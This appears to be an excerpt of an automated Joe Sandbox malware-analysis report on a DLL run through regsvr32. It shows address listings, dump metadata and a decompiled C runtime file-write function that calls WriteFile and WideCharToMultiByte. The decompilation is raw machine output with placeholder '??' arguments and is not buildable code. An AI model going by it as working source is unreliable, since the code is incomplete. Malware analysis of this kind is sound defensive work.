                                                                              0x1002e0ac
                                                                              0x1002e0af
                                                                              0x1002e0b1
                                                                              0x1002e0b5
                                                                              0x1002e0b7
                                                                              0x1002e0b7
                                                                              0x1002e0c3
                                                                              0x1002e0c3
                                                                              0x1002e0b5
                                                                              0x1002e0c9
                                                                              0x1002e0d0
                                                                              0x1002e0d7
                                                                              0x1002e0de
                                                                              0x1002e0e8
                                                                              0x1002e0ed
                                                                              0x1002e0fc
                                                                              0x1002e0fc
                                                                              0x1002e117
                                                                              0x1002e120
                                                                              0x1002e120
                                                                              0x1002e125
                                                                              0x1002e129
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002e12f
                                                                              0x1002e134
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002e13a
                                                                              0x1002dfb6
                                                                              0x1002dfc3
                                                                              0x1002dfc9
                                                                              0x1002dfd3
                                                                              0x1002dfd7
                                                                              0x1002dfd7
                                                                              0x1002dfde
                                                                              0x1002dfe6
                                                                              0x1002dfeb
                                                                              0x1002dfed
                                                                              0x1002dfed
                                                                              0x1002dff1
                                                                              0x1002dff1
                                                                              0x1002dff9
                                                                              0x1002dff9
                                                                              0x1002e001
                                                                              0x1002e001
                                                                              0x1002e00d
                                                                              0x1002e013
                                                                              0x1002e019
                                                                              0x1002e027
                                                                              0x1002e027
                                                                              0x1002e027
                                                                              0x1002e034
                                                                              0x1002e03a
                                                                              0x1002e03f
                                                                              0x1002e055
                                                                              0x1002e055
                                                                              0x1002e05b
                                                                              0x1002e065
                                                                              0x1002e069
                                                                              0x1002e06d
                                                                              0x1002e070
                                                                              0x1002e079
                                                                              0x00000000
                                                                              0x1002e01b
                                                                              0x1002e01e
                                                                              0x1002e023
                                                                              0x1002e025
                                                                              0x1002e098
                                                                              0x00000000
                                                                              0x1002e098
                                                                              0x00000000
                                                                              0x1002e025
                                                                              0x1002e019
                                                                              0x1002df41
                                                                              0x1002df48
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002df4a
                                                                              0x1002df4f
                                                                              0x1002df90
                                                                              0x1002df94
                                                                              0x1002e11e
                                                                              0x1002df9a
                                                                              0x1002dfa0
                                                                              0x1002dfa5
                                                                              0x1002df51
                                                                              0x1002df59
                                                                              0x1002df5f
                                                                              0x1002df68
                                                                              0x1002df77
                                                                              0x1002df83
                                                                              0x1002df89
                                                                              0x00000000
                                                                              0x1002de98
                                                                              0x00000000
                                                                              0x1002dea0
                                                                              0x1002de96
                                                                              0x1002de0f
                                                                              0x1002de13
                                                                              0x1002de16
                                                                              0x1002de23
                                                                              0x1002de29
                                                                              0x1002de2c
                                                                              0x1002de18
                                                                              0x1002de18
                                                                              0x1002de18
                                                                              0x1002de31
                                                                              0x1002de34
                                                                              0x1002de36
                                                                              0x1002de3c
                                                                              0x1002de47
                                                                              0x1002de4a
                                                                              0x1002de4e
                                                                              0x1002de52
                                                                              0x1002de52
                                                                              0x1002de55
                                                                              0x1002de58
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002dddb
                                                                              0x1002ddde
                                                                              0x00000000
                                                                              0x1002dde4
                                                                              0x1002dde4
                                                                              0x1002ddeb
                                                                              0x00000000
                                                                              0x1002ddeb
                                                                              0x1002ddde
                                                                              0x1002ddd9
                                                                              0x1002ddb9
                                                                              0x1002ddc3
                                                                              0x1002ddcc
                                                                              0x1002ddd4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002ddd4
                                                                              0x00000000
                                                                              0x1002e144
                                                                              0x1002e144
                                                                              0x1002e144
                                                                              0x1002e14a
                                                                              0x1002e14e
                                                                              0x1002e231
                                                                              0x1002e231
                                                                              0x1002e231
                                                                              0x1002e154
                                                                              0x1002e158
                                                                              0x1002e15d
                                                                              0x1002e160
                                                                              0x1002e184
                                                                              0x1002e184
                                                                              0x1002e187
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002e18d
                                                                              0x1002e18d
                                                                              0x1002e193
                                                                              0x1002e19d
                                                                              0x1002e19d
                                                                              0x1002e1a3
                                                                              0x1002e1a6
                                                                              0x1002e1a8
                                                                              0x1002e1a8
                                                                              0x1002e1ab
                                                                              0x1002e1ab
                                                                              0x1002e1b0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002e1b2
                                                                              0x1002e1b5
                                                                              0x1002e217
                                                                              0x00000000
                                                                              0x1002e219
                                                                              0x1002e1b7
                                                                              0x1002e1bd
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002e1bf
                                                                              0x1002e1c5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002e1c7
                                                                              0x1002e1cd
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002e1cf
                                                                              0x1002e1d5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002e1d7
                                                                              0x1002e1dd
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002e1df
                                                                              0x1002e1e5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002e1e7
                                                                              0x1002e1ed
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002e1ef
                                                                              0x1002e1f5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002e1f7
                                                                              0x1002e1fd
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002e1ff
                                                                              0x1002e205
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002e207
                                                                              0x1002e20d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002e20f
                                                                              0x1002e215
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002e215
                                                                              0x1002e195
                                                                              0x1002e19b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002e162
                                                                              0x1002e162
                                                                              0x1002e162
                                                                              0x1002e165
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002e167
                                                                              0x1002e16b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002e171
                                                                              0x1002e177
                                                                              0x1002e17a
                                                                              0x1002e17f
                                                                              0x1002e182
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002e182
                                                                              0x00000000
                                                                              0x1002e162

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$ParentState$ClientCursorScreenWindow
                                                                              • String ID: 8
                                                                              • API String ID: 1877249070-4194326291
                                                                              • Opcode ID: ced46c886ac401fe619a1b50e431bbdd9848cae76d94f4b831128fe16f0bd9bf
                                                                              • Instruction ID: 0bbadea3f1e27b1acd9ee6aa7e1703e847ebd330d8640959472ec885872a10fd
                                                                              • Opcode Fuzzy Hash: ced46c886ac401fe619a1b50e431bbdd9848cae76d94f4b831128fe16f0bd9bf
                                                                              • Instruction Fuzzy Hash: EDC1A1367407C082EB60DB25F89439D7390F786BA0F914622DE6A0BBA5CF79DC958701
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10048AF0 Relevance: 29.0, APIs: 19, Instructions: 489COMMONLIBRARYCODECrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 49%
                                                                              			E10048AF0(signed int __ebx, signed int __ecx, signed int __edx, long long __rbx, signed int __rdx, signed long long __rdi, long long __rsi, long long __rbp, signed short* __r8, signed int* __r9, long long __r12, signed int __r13, long long __r14, long long __r15, void* _a32) {
				void* _v8;
				void* _v16;
				void* _v24;
				void* _v32;
				long long _v40;
				void* _v48;
				long long _v56;
				signed int _v72;
				char _v424;
				char _v1464;
				char _v1480;
				signed long long _v1488;
				signed int _v1496;
				signed int _v1500;
				signed int _v1504;
				signed int _v1508;
				signed int _v1512;
				signed long long _v1520;
				signed long long _v1528;
				intOrPtr _v1536;
				signed long long _v1544;
				signed int _t149;
				signed int _t150;
				signed int _t162;
				signed int _t163;
				signed int _t166;
				int _t168;
				long _t169;
				signed int _t171;
				int _t172;
				signed int _t177;
				int _t178;
				int _t183;
				int _t184;
				signed int _t185;
				void* _t186;
				signed int _t190;
				void* _t191;
				int _t193;
				int _t194;
				signed int _t196;
				int _t197;
				void* _t199;
				void* _t200;
				signed int _t211;
				signed int _t212;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed long long _t229;
				signed long long _t230;
				intOrPtr* _t232;
				signed int* _t244;
				signed int* _t246;
				signed int _t248;
				void* _t249;
				intOrPtr _t251;
				signed int _t252;
				signed int* _t256;
				intOrPtr _t265;
				intOrPtr _t267;
				signed short* _t278;
				signed short* _t279;
				signed char* _t280;
				signed long long _t285;
				signed int* _t288;
				signed long long _t293;
				signed int _t295;
				signed long long _t298;
				signed long long _t304;

				_t288 = __r9;
				_t286 = __r8;
				_t283 = __rbp;
				_t281 = __rsi;
				_t276 = __rdi;
				_t274 = __rdx;
				_t218 = __edx;
				_t215 = __ecx;
				_t211 = __ebx;
				_t293 = _t285;
				_t229 =  *0x1006f4c8; // 0x6f13091946cb
				_t230 = _t229 ^ _t285;
				_v72 = _t230;
				 *((long long*)(_t293 + 0x20)) = __rbx;
				 *((long long*)(_t293 - 8)) = __rbp;
				 *((long long*)(_t293 - 0x10)) = __rsi;
				 *((long long*)(_t293 - 0x18)) = __rdi;
				 *((long long*)(_t293 - 0x20)) = __r12;
				 *((long long*)(_t293 - 0x30)) = __r14;
				_t226 = r8d;
				r14d = 0;
				_t225 = 0;
				_t295 = __rdx;
				_t242 = __ecx;
				if(r8d != 0) {
					__eflags = __rdx;
					if(__eflags != 0) {
						_v40 = __r13;
						_v56 = __r15;
						r13b = __ebx;
						r13d = r13d & 0x0000001f;
						_t304 = __ecx >> 5;
						_t298 = __r13 << 6;
						_t251 =  *((intOrPtr*)(0x100772a0 + _t304 * 8));
						_v1496 = _t304;
						_v1488 = _t298;
						_t224 =  *(_t298 + 0x100772d8) & 0x000000ff;
						dil = dil + dil;
						dil = dil >> 1;
						__eflags = dil - 2;
						if(dil == 2) {
							L6:
							__eflags =  !_t226 & 0x00000001;
							if(__eflags != 0) {
								L8:
								__eflags =  *(_t298 + _t251 + 8) & 0x00000020;
								if(( *(_t298 + _t251 + 8) & 0x00000020) != 0) {
									_t218 = 0;
									__eflags = 0;
									_t24 = _t274 + 2; // 0x2
									r8d = _t24;
									E100488B0(_t211, _t211, 0, 0, _t230, _t242, _t274, _t276, _t281, _t283, _t286);
								}
								_t215 = _t211;
								_t149 = E10049480(_t215, _t230, _t242, _t251, _t276, _t281, _t283);
								__eflags = _t149;
								if(_t149 == 0) {
									_t275 = 0x100772a0;
									goto L51;
								} else {
									_t275 = 0x100772a0;
									_t230 =  *((intOrPtr*)(0x100772a0 + _t304 * 8));
									__eflags =  *(_t298 + _t230 + 8) & 0x00000080;
									if(( *(_t298 + _t230 + 8) & 0x00000080) == 0) {
										L51:
										_t252 =  *((intOrPtr*)(_t275 + _t304 * 8));
										__eflags =  *(_t298 + _t252 + 8) & 0x00000080;
										if(( *(_t298 + _t252 + 8) & 0x00000080) == 0) {
											r8d = _t226;
											_t275 = _t295;
											_v1544 = _t281;
											_t150 = WriteFile(??, ??, ??, ??, ??);
											__eflags = _t150;
											if(_t150 == 0) {
												r15d = GetLastError();
												L98:
												__eflags = r15d;
												if(r15d == 0) {
													_t298 = _v1488;
													_t275 = 0x100772a0;
													L103:
													_t232 =  *((intOrPtr*)(_t275 + _v1496 * 8));
													__eflags =  *(_t298 + _t232 + 8) & 0x00000040;
													if(( *(_t298 + _t232 + 8) & 0x00000040) == 0) {
														L106:
														E1003AF40(_t232);
														 *_t232 = 0x1c;
														E1003AF70(__eflags, _t232);
														 *_t232 = 0;
														L107:
														L108:
														L109:
														return E10038D20(_t215, _v72 ^ _t285);
													}
													__eflags =  *_t295 - 0x1a;
													if( *_t295 != 0x1a) {
														goto L106;
													}
													goto L108;
												}
												__eflags = r15d - 5;
												if(__eflags != 0) {
													_t215 = r15d;
													E1003AFA0(r15d, __eflags, _t230, _t275);
												} else {
													E1003AF40(_t230);
													 *_t230 = 9;
													E1003AF70(__eflags, _t230);
													 *_t230 = r15d;
												}
												goto L107;
											}
											r14d = _v1508;
											r15d = 0;
											__eflags = r15d;
											L95:
											__eflags = r14d;
											if(r14d == 0) {
												goto L98;
											}
											r14d = r14d - _t225;
											goto L108;
										}
										r15d = 0;
										__eflags = dil;
										if(dil != 0) {
											__eflags = dil - 2;
											if(dil != 2) {
												__eflags = _t226;
												_t278 = _t295;
												if(_t226 == 0) {
													goto L103;
												}
												do {
													_t256 =  &_v424;
													__eflags = 0;
													do {
														_t162 = _t224 - r12d;
														__eflags = _t162 - _t226;
														if(_t162 >= _t226) {
															break;
														}
														_t162 =  *_t278 & 0x0000ffff;
														_t278 =  &(_t278[1]);
														__eflags = _t162 - 0xa;
														if(_t162 == 0xa) {
															 *_t256 = 0xd;
															_t256 =  &(_t256[0]);
															_t275 = _t275 + 2;
															__eflags = _t275;
														}
														_t275 = _t275 + 2;
														 *_t256 = _t162;
														_t256 =  &(_t256[0]);
														__eflags = _t275 - 0x152;
													} while (_t275 < 0x152);
													_v1520 = _t281;
													_v1528 = _t281;
													_v1536 = 0x2ab;
													_t163 = _t215 - _t162;
													_t215 = 0xfde9;
													asm("cdq");
													r9d = _t163 >> 1;
													_t230 =  &_v1464;
													_v1544 = _t230;
													_t166 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
													__eflags = _t166;
													r13d = _t166;
													if(_t166 == 0) {
														r15d = GetLastError();
														goto L95;
													}
													_t212 = 0;
													__eflags = 0;
													while(1) {
														r8d = r13d;
														_t275 = _t285 + _t212 + 0x70;
														_t230 = _v1488;
														r8d = r8d - _t212;
														_v1544 = _t281;
														_t168 = WriteFile(??, ??, ??, ??, ??);
														__eflags = _t168;
														if(_t168 == 0) {
															break;
														}
														_t212 = _t212 + _v1508;
														__eflags = r13d - _t212;
														if(r13d > _t212) {
															continue;
														}
														goto L90;
													}
													_t169 = GetLastError();
													__eflags = r13d - _t212;
													r15d = _t169;
													if(r13d > _t212) {
														goto L95;
													}
													L90:
													r14d = _t224;
													r14d = r14d - r12d;
													__eflags = r14d - _t226;
												} while (r14d < _t226);
												goto L95;
											}
											__eflags = _t226;
											_t279 = _t295;
											if(_t226 == 0) {
												goto L103;
											}
											do {
												_t244 =  &_v1464;
												_t215 = 0;
												__eflags = 0;
												do {
													_t171 = _t224 - r12d;
													__eflags = _t171 - _t226;
													if(_t171 >= _t226) {
														break;
													}
													_t171 =  *_t279 & 0x0000ffff;
													_t279 =  &(_t279[1]);
													__eflags = _t171 - 0xa;
													if(_t171 == 0xa) {
														 *_t244 = 0xd;
														_t244 =  &(_t244[0]);
														_t225 = _t225 + 2;
														_t252 = _t252 + 2;
														__eflags = _t252;
													}
													_t252 = _t252 + 2;
													 *_t244 = _t171;
													_t244 =  &(_t244[0]);
													__eflags = _t252 - 0x3ff;
												} while (_t252 < 0x3ff);
												r8d = _t211;
												r8d = r8d - _t171;
												_t230 = _v1496;
												_v1544 = _t304;
												_t275 =  &_v1464;
												_t172 = WriteFile(??, ??, ??, ??, ??);
												__eflags = _t172;
												if(_t172 == 0) {
													r15d = GetLastError();
													goto L95;
												}
												_t230 = _v1508;
												_t252 =  &_v1464;
												r14d = r14d + _t172;
												__eflags = _t230 - _t244 - _t252;
												if(_t230 < _t244 - _t252) {
													goto L95;
												}
												_t275 = 0x100772a0;
												__eflags = _t224 - r12d - _t226;
											} while (_t224 - r12d < _t226);
											goto L95;
										}
										__eflags = _t226;
										_t280 = _t295;
										if(_t226 == 0) {
											goto L103;
										} else {
											goto L54;
										}
										do {
											L54:
											_t246 =  &_v1464;
											_t215 = 0;
											__eflags = 0;
											do {
												_t177 = _t224 - r12d;
												__eflags = _t177 - _t226;
												if(_t177 >= _t226) {
													break;
												}
												_t177 =  *_t280 & 0x000000ff;
												_t280 =  &(_t280[1]);
												__eflags = _t177 - 0xa;
												if(_t177 == 0xa) {
													 *_t246 = 0xd;
													_t246 =  &(_t246[0]);
													_t225 = _t225 + 1;
													_t252 = _t252 + 1;
													__eflags = _t252;
												}
												_t252 = _t252 + 1;
												 *_t246 = _t177;
												_t246 =  &(_t246[0]);
												__eflags = _t252 - 0x400;
											} while (_t252 < 0x400);
											r8d = _t211;
											r8d = r8d - _t177;
											_t230 = _v1496;
											_v1544 = _t304;
											_t275 =  &_v1464;
											_t178 = WriteFile(??, ??, ??, ??, ??);
											__eflags = _t178;
											if(_t178 == 0) {
												r15d = GetLastError();
												goto L95;
											}
											_t230 = _v1508;
											_t252 =  &_v1464;
											r14d = r14d + _t178;
											__eflags = _t230 - _t246 - _t252;
											if(_t230 < _t246 - _t252) {
												goto L95;
											}
											_t275 = 0x100772a0;
											__eflags = _t224 - r12d - _t226;
										} while (_t224 - r12d < _t226);
										goto L95;
									}
									E1003D060(_t230, _t242, _t251, 0x100772a0, _t276, _t281, _t283, _t286, _t295);
									_t275 =  &_v1504;
									_t265 =  *((intOrPtr*)(_t230 + 0xc0));
									_t230 = 0x100772a0;
									__eflags =  *(_t265 + 0x14);
									_t267 =  *((intOrPtr*)(_t298 +  *((intOrPtr*)(0x100772a0 + _t304 * 8))));
									_t211 = 0 |  *(_t265 + 0x14) == 0x00000000;
									_t183 = GetConsoleMode(??, ??);
									__eflags = _t183;
									if(_t183 == 0) {
										_t275 = 0x100772a0;
										goto L51;
									}
									__eflags = _t211;
									if(_t211 == 0) {
										L15:
										_t184 = GetConsoleCP();
										__eflags = _t226;
										_v1500 = _t225;
										r13d = _t184;
										_v1504 = _t184;
										_t248 = _t295;
										if(_t226 == 0) {
											r15d = _v1504;
											goto L98;
										}
										r15d = _v1504;
										do {
											__eflags = dil;
											if(dil != 0) {
												__eflags = dil - 1;
												if(dil == 1) {
													L34:
													_t185 =  *_t248 & 0x0000ffff;
													r15d = 0;
													__eflags = _t185 - 0xa;
													_v1512 = _t185;
													r15b = _t185 == 0xa;
													_t248 = _t248 + 2;
													__eflags = _t248;
													L35:
													__eflags = dil - 1;
													if(dil == 1) {
														L37:
														_t215 = _v1512 & 0x0000ffff;
														_t186 = E1004CAD0(_v1512 & 0x0000ffff, _t218);
														__eflags = _t186 - _v1512;
														if(_t186 != _v1512) {
															r15d = GetLastError();
															goto L95;
														}
														r14d = r14d + 1;
														__eflags = r15d;
														if(r15d == 0) {
															goto L41;
														}
														_t215 = 0xd;
														_v1512 = 0xd;
														_t200 = E1004CAD0(0xd, _t218);
														__eflags = _t200 - _v1512;
														if(_t200 != _v1512) {
															r15d = GetLastError();
															goto L95;
														}
														r14d = r14d + 1;
														_t225 = _t225 + 1;
														__eflags = _t225;
														goto L41;
													}
													__eflags = dil - 2;
													if(dil != 2) {
														goto L41;
													}
													goto L37;
												}
												__eflags = dil - 2;
												if(dil != 2) {
													goto L35;
												}
												goto L34;
											}
											_t215 =  *_t248;
											r15d = 0;
											__eflags =  *_t248 - 0xa;
											r15b =  *_t248 == 0xa;
											_t190 = E10049B00( *_t248, _t230, _t248, _t267, _t276, _t281, _t283, _t286, _t295);
											__eflags = _t190;
											if(_t190 != 0) {
												_t230 = _t283 - _t248 + _t295;
												__eflags = _t230 - 1;
												if(_t230 <= 1) {
													L20:
													r15d = _v1504;
													goto L95;
												}
												r8d = 2;
												_t275 = _t248;
												_t191 = E10049E50(_t215, _t224, _t225, _t230, _t248,  &_v1512, _t248, _t276, _t281, _t283, _t286, _t288, _t295);
												__eflags = _t191 - 0xffffffff;
												if(_t191 == 0xffffffff) {
													goto L20;
												}
												_t248 = _t248 + 1;
												__eflags = _t248;
												L24:
												_t286 =  &_v1512;
												r9d = 1;
												_v1520 = _t230;
												_v1528 = _t230;
												_t230 =  &_v1480;
												_t218 = 0;
												_t215 = r13d;
												_v1536 = 5;
												_v1544 = _t230;
												_t248 = _t248 + 1;
												_t193 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
												__eflags = _t193;
												r13d = _t193;
												if(_t193 == 0) {
													goto L20;
												}
												_t288 =  &_v1500;
												_t230 = _v1488;
												_t275 =  &_v1480;
												_t267 =  *((intOrPtr*)(_t230 +  *((intOrPtr*)(0x100772a0 + _v1496 * 8))));
												r8d = r13d;
												_v1544 = 0;
												_t194 = WriteFile(??, ??, ??, ??, ??);
												__eflags = _t194;
												if(_t194 == 0) {
													r15d = GetLastError();
													goto L95;
												}
												_t196 = _v1500;
												r14d = r14d + _t196;
												__eflags = _t196 - r13d;
												if(_t196 < r13d) {
													goto L20;
												}
												__eflags = r15d;
												if(r15d == 0) {
													r13d = _v1504;
													goto L41;
												}
												_v1480 = 0xd;
												_t230 = _v1488;
												_t288 =  &_v1500;
												_t267 =  *((intOrPtr*)(_t230 +  *((intOrPtr*)(0x100772a0 + _v1496 * 8))));
												_t275 =  &_v1480;
												r8d = 1;
												_v1544 = 0;
												_t197 = WriteFile(??, ??, ??, ??, ??);
												__eflags = _t197;
												if(_t197 == 0) {
													r15d = GetLastError();
													goto L95;
												}
												__eflags = _v1500 - 1;
												if(_v1500 < 1) {
													goto L20;
												}
												r13d = _v1504;
												_t225 = _t225 + 1;
												r14d = r14d + 1;
												goto L41;
											}
											_t42 = _t230 + 1; // 0x1
											r8d = _t42;
											_t275 = _t248;
											_t199 = E10049E50(_t215, _t224, _t225, _t230, _t248,  &_v1512, _t248, _t276, _t281, _t283, _t286, _t288, _t295);
											__eflags = _t199 - 0xffffffff;
											if(_t199 != 0xffffffff) {
												goto L24;
											}
											goto L20;
											L41:
											__eflags = _t211 - r12d - _t226;
										} while (_t211 - r12d < _t226);
										r15d = _v1504;
										goto L95;
									}
									__eflags = dil;
									if(dil == 0) {
										_t275 = 0x100772a0;
										goto L51;
									}
									goto L15;
								}
							}
							E1003AF70(__eflags, _t230);
							 *_t230 = 0;
							E1003AF40(_t230);
							r9d = 0;
							r8d = 0;
							_t215 = 0;
							 *_t230 = 0x16;
							_v1544 = _t242;
							E1003C790(_t242, _t251, _t274, _t276, _t281, _t283, _t286);
							goto L107;
						}
						__eflags = dil - 1;
						if(dil != 1) {
							goto L8;
						}
						goto L6;
					}
					E1003AF70(__eflags, _t230);
					 *_t230 = 0;
					E1003AF40(_t230);
					r9d = 0;
					r8d = 0;
					_t215 = 0;
					 *_t230 = 0x16;
					_v1544 = __rdi;
					E1003C790(__ecx, _t249, __rdx, __rdi, __rsi, __rbp, __r8);
					goto L109;
				}
				goto L109;
			}









































































                                                                              0x10048af0
                                                                              0x10048af0
                                                                              0x10048af0
                                                                              0x10048af0
                                                                              0x10048af0
                                                                              0x10048af0
                                                                              0x10048af0
                                                                              0x10048af0
                                                                              0x10048af0
                                                                              0x10048af0
                                                                              0x10048afa
                                                                              0x10048b01
                                                                              0x10048b04
                                                                              0x10048b0c
                                                                              0x10048b10
                                                                              0x10048b14
                                                                              0x10048b18
                                                                              0x10048b21
                                                                              0x10048b25
                                                                              0x10048b29
                                                                              0x10048b2c
                                                                              0x10048b2f
                                                                              0x10048b31
                                                                              0x10048b34
                                                                              0x10048b37
                                                                              0x10048b40
                                                                              0x10048b43
                                                                              0x10048b75
                                                                              0x10048b7d
                                                                              0x10048b85
                                                                              0x10048b88
                                                                              0x10048b96
                                                                              0x10048b9a
                                                                              0x10048b9e
                                                                              0x10048ba2
                                                                              0x10048ba7
                                                                              0x10048bac
                                                                              0x10048bb2
                                                                              0x10048bb5
                                                                              0x10048bb8
                                                                              0x10048bbc
                                                                              0x10048bc4
                                                                              0x10048bc8
                                                                              0x10048bca
                                                                              0x10048bf9
                                                                              0x10048bf9
                                                                              0x10048bff
                                                                              0x10048c01
                                                                              0x10048c01
                                                                              0x10048c05
                                                                              0x10048c05
                                                                              0x10048c09
                                                                              0x10048c09
                                                                              0x10048c0e
                                                                              0x10048c10
                                                                              0x10048c15
                                                                              0x10048c17
                                                                              0x10048ec0
                                                                              0x00000000
                                                                              0x10048c1d
                                                                              0x10048c1d
                                                                              0x10048c24
                                                                              0x10048c28
                                                                              0x10048c2e
                                                                              0x10048ed9
                                                                              0x10048ed9
                                                                              0x10048edd
                                                                              0x10048ee3
                                                                              0x100491aa
                                                                              0x100491ad
                                                                              0x100491b0
                                                                              0x100491b5
                                                                              0x100491bb
                                                                              0x100491bd
                                                                              0x100491da
                                                                              0x100491dd
                                                                              0x100491dd
                                                                              0x100491e0
                                                                              0x10049207
                                                                              0x1004920c
                                                                              0x10049213
                                                                              0x10049218
                                                                              0x1004921c
                                                                              0x10049222
                                                                              0x1004922f
                                                                              0x1004922f
                                                                              0x10049234
                                                                              0x1004923a
                                                                              0x1004923f
                                                                              0x10049245
                                                                              0x1004924a
                                                                              0x1004925a
                                                                              0x100492a1
                                                                              0x100492a1
                                                                              0x10049224
                                                                              0x10049229
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004922b
                                                                              0x100491e2
                                                                              0x100491e6
                                                                              0x100491fd
                                                                              0x10049200
                                                                              0x100491e8
                                                                              0x100491e8
                                                                              0x100491ed
                                                                              0x100491f3
                                                                              0x100491f8
                                                                              0x100491f8
                                                                              0x00000000
                                                                              0x100491e6
                                                                              0x100491bf
                                                                              0x100491c4
                                                                              0x100491c4
                                                                              0x100491c7
                                                                              0x100491c7
                                                                              0x100491ca
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100491cc
                                                                              0x00000000
                                                                              0x100491cf
                                                                              0x10048ee9
                                                                              0x10048eec
                                                                              0x10048eef
                                                                              0x10048fae
                                                                              0x10048fb2
                                                                              0x10049083
                                                                              0x10049085
                                                                              0x10049088
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10049090
                                                                              0x10049090
                                                                              0x10049098
                                                                              0x100490a0
                                                                              0x100490a2
                                                                              0x100490a5
                                                                              0x100490a7
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100490a9
                                                                              0x100490ac
                                                                              0x100490b0
                                                                              0x100490b4
                                                                              0x100490b6
                                                                              0x100490bb
                                                                              0x100490bf
                                                                              0x100490bf
                                                                              0x100490bf
                                                                              0x100490c3
                                                                              0x100490c7
                                                                              0x100490ca
                                                                              0x100490ce
                                                                              0x100490ce
                                                                              0x100490df
                                                                              0x100490e4
                                                                              0x100490f3
                                                                              0x100490fb
                                                                              0x100490fd
                                                                              0x10049102
                                                                              0x10049109
                                                                              0x1004910c
                                                                              0x10049111
                                                                              0x10049116
                                                                              0x1004911c
                                                                              0x1004911e
                                                                              0x10049121
                                                                              0x1004919b
                                                                              0x00000000
                                                                              0x1004919b
                                                                              0x10049123
                                                                              0x10049123
                                                                              0x10049130
                                                                              0x10049138
                                                                              0x1004913b
                                                                              0x10049150
                                                                              0x10049155
                                                                              0x1004915c
                                                                              0x10049161
                                                                              0x10049167
                                                                              0x10049169
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004916b
                                                                              0x1004916f
                                                                              0x10049172
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10049174
                                                                              0x10049176
                                                                              0x1004917c
                                                                              0x1004917f
                                                                              0x10049182
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10049184
                                                                              0x10049184
                                                                              0x10049187
                                                                              0x1004918a
                                                                              0x1004918a
                                                                              0x00000000
                                                                              0x10049193
                                                                              0x10048fb8
                                                                              0x10048fba
                                                                              0x10048fbd
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10048fd0
                                                                              0x10048fd0
                                                                              0x10048fd5
                                                                              0x10048fd5
                                                                              0x10048fd7
                                                                              0x10048fd9
                                                                              0x10048fdc
                                                                              0x10048fde
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10048fe0
                                                                              0x10048fe3
                                                                              0x10048fe7
                                                                              0x10048feb
                                                                              0x10048fed
                                                                              0x10048ff2
                                                                              0x10048ff6
                                                                              0x10048ff9
                                                                              0x10048ff9
                                                                              0x10048ff9
                                                                              0x10048ffd
                                                                              0x10049001
                                                                              0x10049004
                                                                              0x10049008
                                                                              0x10049008
                                                                              0x10049016
                                                                              0x1004901e
                                                                              0x10049021
                                                                              0x10049026
                                                                              0x1004902f
                                                                              0x10049039
                                                                              0x1004903f
                                                                              0x10049041
                                                                              0x1004907b
                                                                              0x00000000
                                                                              0x1004907b
                                                                              0x10049043
                                                                              0x10049048
                                                                              0x10049050
                                                                              0x10049053
                                                                              0x10049056
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004905e
                                                                              0x10049068
                                                                              0x10049068
                                                                              0x00000000
                                                                              0x10049070
                                                                              0x10048ef5
                                                                              0x10048ef7
                                                                              0x10048efa
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10048f00
                                                                              0x10048f00
                                                                              0x10048f00
                                                                              0x10048f05
                                                                              0x10048f05
